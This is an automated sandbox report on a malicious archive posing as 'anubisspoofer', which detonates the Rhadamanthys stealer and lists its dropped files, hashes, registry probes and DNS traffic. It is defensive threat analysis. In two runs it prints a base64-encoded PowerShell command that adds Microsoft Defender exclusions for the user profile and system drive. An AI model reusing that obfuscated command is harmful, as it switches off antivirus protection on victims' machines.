Malware Analysis Report

2024-11-15 06:03

Sample ID 240928-lyq4gszbkp
Target anubisspoofer.rar
SHA256 939cdd940184fa0be3ac8de9330d66e144d93396098713278e736e6ab1396f72
Tags
rhadamanthys defense_evasion discovery stealer
score
10/10

Analysis Overview

score
10/10

SHA256

939cdd940184fa0be3ac8de9330d66e144d93396098713278e736e6ab1396f72

Threat Level: Known bad

The file anubisspoofer.rar was found to be: Known bad.

Malicious Activity Summary

rhadamanthys defense_evasion discovery stealer

Detect rhadamanthys stealer shellcode

Rhadamanthys

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Obfuscated Files or Information: Command Obfuscation

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-28 09:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win7-20240903-en

Max time kernel

146s

Max time network

120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar"

Network

N/A

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win10v2004-20240802-en

Max time kernel

93s

Max time network

95s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win7-20240903-en

Max time kernel

14s

Max time network

18s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\Launcher.exe
PID 2752 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\Launcher.exe
PID 2752 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\Launcher.exe
PID 2752 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\Launcher.exe
PID 2752 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
PID 2752 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
PID 2752 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
PID 2752 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
PID 2420 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\system32\cmd.exe
PID 2420 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\system32\cmd.exe
PID 2420 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Anubis.exe

"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\Launcher.exe

MD5 a8db312e9364d1d82600bf5a398212fe
SHA1 3bbacada2b463bb9f62ed7ae34a8e8440bc91dcb
SHA256 84e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb
SHA512 a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782

\Users\Admin\AppData\Local\Temp\WindowsHost.exe

MD5 515a0c8be21a5ba836e5687fc2d73333
SHA1 c52be9d0d37ac1b8d6bc09860e68e9e0615255ab
SHA256 9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae
SHA512 4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522

memory/2932-17-0x0000000000230000-0x0000000000237000-memory.dmp

memory/2932-18-0x0000000001F80000-0x0000000002380000-memory.dmp

memory/2932-19-0x0000000001F80000-0x0000000002380000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:57

Platform

win10v2004-20240802-en

Max time kernel

20s

Max time network

22s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Anubis.exe

"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

MD5 a8db312e9364d1d82600bf5a398212fe
SHA1 3bbacada2b463bb9f62ed7ae34a8e8440bc91dcb
SHA256 84e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb
SHA512 a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782

C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe

MD5 515a0c8be21a5ba836e5687fc2d73333
SHA1 c52be9d0d37ac1b8d6bc09860e68e9e0615255ab
SHA256 9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae
SHA512 4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5dae4za.q2s.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral5

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1708 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 1708 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 1708 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1708 -s 260

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win10v2004-20240802-en

Max time kernel

93s

Max time network

95s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A